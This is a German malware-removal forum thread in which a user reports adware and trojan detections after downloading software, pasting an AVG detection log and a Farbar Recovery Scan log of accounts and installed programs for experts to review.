Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Malware-gen, Adware-gen ...usw

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML

Antwort
Alt 20.09.2015, 19:10   #1
Zympop
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



Guten Abend zusammen

Ich habe gestern versucht Software runterzuladen und bin dabei anscheinend voll in die Kuhscheiße getretten.

Mein Computer läuft soweit stabil... naja er kommt mir schon seit einigen Wochen etwas langsamer vor und noch schlimmer ist es noch nicht geworden.

AVG erkennt die ganze zeit 20 verschiedene Trojaner Malware usw ...
Nachdem ich mabam durchlaufen lassen habe, war auch keine besserung in sicht AVG erkennt wieder 20 verschiedene sachen und Blockt sie erfolgreich...für einige Zeit.

Ich bedanke mich jetzt schonmal für eure Hilfe.

AVG log
Code:
ATTFilter
Residenter Schutz Erkennung
Name der Bedrohung
Adware: Generic6.BRNO, c:\Program Files (x86)\ospd_us_013010091\onesoftperday_widget.exe
Adware: Generic6.CEQU, c:\Program Files (x86)\DNS Keeper\ConsoleApplication1.dll
Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RQMWWTX9\prepreinstaller_win[2].exe
Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Temp\nss6DC2.tmp
Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Temp\nss6DC2.tmp
Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RQMWWTX9\prepreinstaller_win[1].exe
Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Temp\nshE782.tmp
Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Temp\nshE782.tmp
Adware: Generic6.CGID, c:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\rnsl19B4.exe
Adware: Generic6.CGIE, c:\Windows\Temp\7014.tmp.exe
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nss73A.tmp
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nss73A.tmp
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\AnyProtectSetup[1].exe
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsxB85F.tmp
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsxB85F.tmp
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsxB473.tmp
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsnFFBA.tmp
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsnFFBA.tmp
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\AnyProtectSetup[1].exe
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WTXQ07VN\AnyProtectSetup[1].exe
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsxB473.tmp
Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\AnyProtectSetup[1].exe
Adware: Generic_r.YY, c:\Users\Kenny G\AppData\Local\Temp\nsn2472.tmp
Adware: Generic_r.YY, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\Setup[1].exe
Adware: Generic_r.YY, c:\Users\Kenny G\AppData\Local\Temp\nsn2472.tmp
Adware: InstallCore.ALX, c:\Users\Kenny G\AppData\Local\Temp\nsnCA65.tmp
Adware: InstallCore.ALX, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JSGHNXR8\Setup[1].exe
Adware: InstallCore.ALX, c:\Users\Kenny G\AppData\Local\Temp\nsnCA65.tmp
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsn95FA.tmp
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JSGHNXR8\VuuPC_VO2_8907[1].exe
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsn95FA.tmp
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsm5BD2.tmp
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsx51F9.tmp
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsx51F9.tmp
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\VuuPC_VO2_8907[1].exe
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\VuuPC_VO2_8907[1].exe
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\VuuPC_VO2_8907[2].exe
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsm5BD2.tmp
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsxABEB.tmp
Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsxABEB.tmp
Luhe.Fiha.A gefunden, c:\Users\Kenny G\Desktop\Native Instruments Traktor Pro 2.7.3 + Crack\Crack\NI_Traktor_Patch.exe
Luhe.Fiha.A gefunden, c:\Users\Kenny G\Desktop\NI_Traktor_Patch.exe
MalSign.Generic.445 gefunden, c:\Program Files (x86)\ospd_us_013010091\ospd_us_013010091.exe
MalSign.Generic.445 gefunden, c:\Users\Kenny G\AppData\Local\ospd_us_013010091\upospd_us_013010091.exe
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\SmartWebInstaller[1].exe
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsh612E.tmp
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RQMWWTX9\SmartWebInstaller[1].exe
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nshAA44.tmp
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsh612E.tmp
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WTXQ07VN\SmartWebInstaller[1].exe
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsr4F24.tmp
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsmE7AB.tmp
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsmE7AB.tmp
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nshAA44.tmp
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsr4F24.tmp
MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JSGHNXR8\SmartWebInstaller[1].exe
MalSign.Generic.6E7 gefunden, c:\Users\Kenny G\AppData\Roaming\RPEng\1ACA2586F62B4C6889A51621D81FE007\setup.exe
MalSign.Generic.754 gefunden, c:\Program Files (x86)\Max Driver Updater\updater\extract\7z.exe
MalSign.Generic.754 gefunden, c:\Program Files (x86)\Max Driver Updater\unins000.exe
MalSign.Generic.754 gefunden, c:\Program Files (x86)\Max Driver Updater\updater\extract\7z.dll
MalSign.Generic.754 gefunden, c:\Program Files (x86)\MaxDrivrUpdater\Maxdriverupdater.exe
MalSign.Generic.754 gefunden, c:\Program Files (x86)\Max Driver Updater\isxdl.dll
MalSign.Generic.754 gefunden, c:\Program Files (x86)\MaxDrivrUpdater\Maxdriverupdater.exe
MalSign.Generic.754 gefunden, c:\Program Files (x86)\Max Driver Updater\updater\amd64Helper\DriverUpdateHelper64.exe
MalSign.Generic.90F gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsr52B3.tmp\setupfa_4435.exe
MalSign.Generic.90F gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsr52B3.tmp\setupfa_4435.exe
MalSign.Generic.90F gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\setupfa_4435[1].exe
MalSign.Generic.978 gefunden, c:\Users\Kenny G\AppData\Local\Temp\jydzpQC7.exe.part
MalSign.Generic.978 gefunden, c:\Users\Kenny G\AppData\Local\Temp\QOSrDpYn.exe.part
MalSign.Generic.978 gefunden, c:\Users\Kenny G\AppData\Local\Temp\QV3B4s4W.exe.part
MalSign.Generic.DBC gefunden, c:\Users\Kenny G\AppData\Local\Temp\LwsT9tew.exe.part
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nscBC7F.tmp
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JSGHNXR8\setup_gmsd_de[1].exe
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WTXQ07VN\setup_gmsd_de[1].exe
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nscDDF.tmp
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsdEA29.tmp
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nshA34A.tmp
MalSign.Generic.EC7 gefunden, c:\Program Files (x86)\ospd_us_013010091\predm.exe
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JSGHNXR8\setup_gmsd_de[1].exe
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsdEA29.tmp
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nshA34A.tmp
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\ospd_us_013010091\Download\myoffergroup_de.exe
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\is-3JNUP.tmp\gentlemjmp_ieu.exe
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WTXQ07VN\setup_gmsd_de[1].exe
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nscBC7F.tmp
MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nscDDF.tmp
Potenziell unerwünschte Anwendung: Downloader.FGJ, c:\Users\Kenny G\AppData\Local\Temp\nskE265.tmp\frghw.dll
Potenziell unerwünschte Anwendung: Downloader.FGJ, c:\Users\Kenny G\AppData\Local\Temp\RarSFX0\Auto KMS Remover 1.37.exe
Potenziell unerwünschte Anwendung: Downloader.TMZ, c:\Program Files (x86)\DNS Keeper\dnsridgewood.exe
Potenziell unerwünschte Anwendung: Downloader.VND, c:\Users\Kenny G\AppData\Local\Temp\UBp9D69.exe
Trojaner: Adload_r.BBG, c:\Users\Kenny G\AppData\Local\Temp\oo2.exe
Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\installer[1].exe
Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsm41DB.tmp
Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Temp\nss82D7.tmp
Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RQMWWTX9\setup[1].exe
Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsm41DB.tmp
Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Temp\nss82D7.tmp
         
Addition

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:15-09-2015
durchgeführt von Kenny G (2015-09-20 19:35:12)
Gestartet von C:\Users\Kenny G\Downloads
Windows 7 Ultimate (X64) (2013-10-01 16:18:55)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-682121585-3582832733-1082443493-500 - Administrator - Disabled)
eLoot (S-1-5-21-682121585-3582832733-1082443493-1008 - Administrator - Enabled) => C:\Users\eLoot
Gast (S-1-5-21-682121585-3582832733-1082443493-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-682121585-3582832733-1082443493-1002 - Limited - Enabled)
Kenny G (S-1-5-21-682121585-3582832733-1082443493-1000 - Administrator - Enabled) => C:\Users\Kenny G
Tabea Studium (S-1-5-21-682121585-3582832733-1082443493-1009 - Limited - Enabled) => C:\Users\Tabea Studium
UpdatusUser (S-1-5-21-682121585-3582832733-1082443493-1007 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)


==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

888poker (HKLM-x32\...\888poker) (Version:  - )
aborange Crypter - Deinstallation (HKLM-x32\...\aborange Crypter_is1) (Version: 3.10 - Mathias Gerlach [aborange.de])
Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.12) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.)
Auslogics DiskDefrag (HKLM-x32\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.4.2.0 - Auslogics Labs Pty Ltd)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.6140 - AVG Technologies)
AVG 2015 (Version: 15.0.4419 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.6140 - AVG Technologies) Hidden
AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.1.6.294 - AVG Technologies)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield: Bad Company 2 (HKLM-x32\...\Steam App 24960) (Version:  - DICE)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 4.06 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5571 - CDBurnerXP)
Cliqz (HKLM-x32\...\{5A0C0737-6AFE-4DC6-A8B4-6DFE509ACD75}_is1) (Version: 0.5.31 - Cliqz.com)
Counter-Strike (HKLM-x32\...\Steam App 10) (Version:  - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
CyberGhost 5 (HKLM\...\CyberGhost 5_is1) (Version:  - CyberGhost S.R.L.)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd)
Free Alarm Clock 3.1.0 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 3.1 - Comfort Software Group)
Free YouTube Download version 3.2.61.805 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.61.805 - DVDVideoSoft Ltd.)
Free YouTube to MP3 Converter version 3.12.61.805 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version: 3.12.61.805 - DVDVideoSoft Ltd.)
GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.93 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\ICQ) (Version: 8.2.6901.0 - ICQ)
iTunes (HKLM\...\{A535111D-95C8-487F-869E-CE4C239972D2}) (Version: 11.1.1.11 - Apple Inc.)
Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.450 - Oracle)
JetBoost (HKLM-x32\...\JetBoost_is1) (Version: 2.0.0 - BlueSprig)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden
LibreOffice 4.2.2.1 (HKLM-x32\...\{0ECDB550-79ED-4E9E-851B-19A8B2B4EBFA}) (Version: 4.2.2.1 - The Document Foundation)
Malwarebytes Anti-Malware Version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Mozilla Firefox 40.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 40.0.3 (x86 de)) (Version: 40.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0.3.5716 - Mozilla)
Mozilla Thunderbird 24.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.6.0 (x86 de)) (Version: 24.6.0 - Mozilla)
Native Instruments Audio 2 DJ Driver (HKLM-x32\...\Native Instruments Audio 2 DJ Driver) (Version:  - Native Instruments)
Native Instruments Audio 4 DJ Driver (HKLM-x32\...\Native Instruments Audio 4 DJ Driver) (Version:  - Native Instruments)
Native Instruments Audio 8 DJ Driver (HKLM-x32\...\Native Instruments Audio 8 DJ Driver) (Version:  - Native Instruments)
Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version: 1.8.2.281 - Native Instruments)
Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.6.0.137 - Native Instruments)
Native Instruments Traktor (HKLM-x32\...\Native Instruments Traktor) (Version:  - Native Instruments)
Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: 2.9.0.1257 - Native Instruments)
Native Instruments Traktor Audio 2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Audio 2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Audio 6 Driver (HKLM-x32\...\Native Instruments Traktor Audio 6 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol D2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol D2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol F1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol F1 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S4 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S4 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S8 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S8 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol X1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol X1 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol Z1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z1 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol Z2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z2 Driver) (Version:  - Native Instruments)
NVIDIA 3D Vision Controller-Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 331.65 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.65 - NVIDIA Corporation)
NVIDIA Grafiktreiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.13.0725 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0725 - NVIDIA Corporation)
NVIDIA Virtual Audio 1.2.9 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.9 - NVIDIA Corporation)
Opera Stable 32.0.1948.25 (HKLM-x32\...\Opera 32.0.1948.25) (Version: 32.0.1948.25 - Opera Software)
Pidgin (HKLM-x32\...\Pidgin) (Version: 2.10.7 - )
pidgin-otr 4.0.0-1 (HKLM-x32\...\pidgin-otr) (Version: 4.0.0-1 - Cypherpunks CA)
Poker 770 (HKLM-x32\...\Poker 770) (Version:  - )
PokerStars.eu (HKLM-x32\...\PokerStars.eu) (Version:  - PokerStars.eu)
Project 64 version 2.1.0.1 (HKLM-x32\...\Project 64_is1) (Version: 2.1.0.1 - )
SHIELD Streaming (Version: 1.6.34 - NVIDIA Corporation) Hidden
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
SleepTimer Ultimate 1.2 (HKLM-x32\...\{0EE56463-49B2-45E1-B74F-3E0139DBC986}_is1) (Version:  - Christian Handorf)
Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.13.13.201311261136 - Sony Mobile Communications AB)
Sony PC Companion 2.10.188 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.188 - Sony)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
TrackMania United (HKLM-x32\...\Steam App 7200) (Version:  - Nadeo)
Trojan Remover 6.9.3 (HKLM-x32\...\Trojan Remover_is1) (Version: 6.9.3 - Simply Super Software)
TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player 2.1.0 (HKLM-x32\...\VLC media player) (Version: 2.1.0 - VideoLAN)
VNC Viewer 5.1.0 (HKLM\...\{8F29CFF4-4A54-4C34-8905-B74527DE93C8}) (Version: 5.1.0 - RealVNC Ltd)
Web Companion (HKLM-x32\...\{99640eec-4d74-4df5-95f4-719dc27de6a8}) (Version: 2.0.1025.2130 - Lavasoft)
Webocton - Scriptly 0.8.95.6 (HKLM-x32\...\Webocton - Scriptly_is1) (Version: 0.8.95.6 - Webocton)
William Hill Poker (HKLM-x32\...\William Hill Poker) (Version:  - )
WinRAR 5.01 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Wuala) (Version: 1.0.444.0 - LaCie)
Wuala CBFS (HKLM-x32\...\Wuala CBFS) (Version: 3.2.107.0 - LaCie)
Wuala OverlayIcons (HKLM-x32\...\Wuala OverlayIcons) (Version: 1.0.0.2 - LaCie)
Xilisoft iPhone Magic (HKLM-x32\...\Xilisoft iPhone Magic) (Version: 5.7.5.20150727 - Xilisoft)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Wiederherstellungspunkte =========================

Wiederherstellungspunkte konnten nicht aufgelistet werden
Überprüfen Sie den "winmgmt" Dienst oder reparieren Sie den WMI.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

